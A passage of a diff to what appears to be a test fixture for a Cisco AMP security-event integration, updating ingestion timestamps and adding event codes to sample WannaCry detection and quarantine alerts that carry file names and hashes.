+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419303574240494000",
@@ -2732,8 +2766,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420979402Z",
+                "ingested": "2021-09-30T00:14:44.025281853Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419303574240494000",
@@ -2803,8 +2838,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420981158Z",
+                "ingested": "2021-09-30T00:14:44.025284137Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303569945526000",
@@ -2878,8 +2914,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420982902Z",
+                "ingested": "2021-09-30T00:14:44.025286500Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303569945526000",
@@ -2953,8 +2990,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420984654Z",
+                "ingested": "2021-09-30T00:14:44.025288757Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303569945526000",
@@ -3028,8 +3066,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420986407Z",
+                "ingested": "2021-09-30T00:14:44.025291244Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419303569945526000",
@@ -3128,8 +3167,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420988187Z",
+                "ingested": "2021-09-30T00:14:44.025293456Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303569945526000",
@@ -3230,8 +3270,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420989931Z",
+                "ingested": "2021-09-30T00:14:44.025295717Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303569945526000",
@@ -3307,8 +3348,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420991687Z",
+                "ingested": "2021-09-30T00:14:44.025298010Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419303569945526000",
@@ -3378,8 +3420,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420993431Z",
+                "ingested": "2021-09-30T00:14:44.025300329Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419303569945526000",
@@ -3465,8 +3508,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420995187Z",
+                "ingested": "2021-09-30T00:14:44.025302577Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303565650559000",
@@ -3554,8 +3598,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420996955Z",
+                "ingested": "2021-09-30T00:14:44.025304802Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303565650559000",
@@ -3650,8 +3695,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.420998706Z",
+                "ingested": "2021-09-30T00:14:44.025307041Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303565650559000",
@@ -3750,8 +3796,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421000462Z",
+                "ingested": "2021-09-30T00:14:44.025309292Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303565650559000",
@@ -3839,8 +3886,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421002215Z",
+                "ingested": "2021-09-30T00:14:44.025311506Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303565650559000",
@@ -3924,8 +3972,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421003961Z",
+                "ingested": "2021-09-30T00:14:44.025313723Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419303565650559000",
@@ -4022,8 +4071,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:33.421005717Z",
+                "ingested": "2021-09-30T00:14:44.025315961Z",
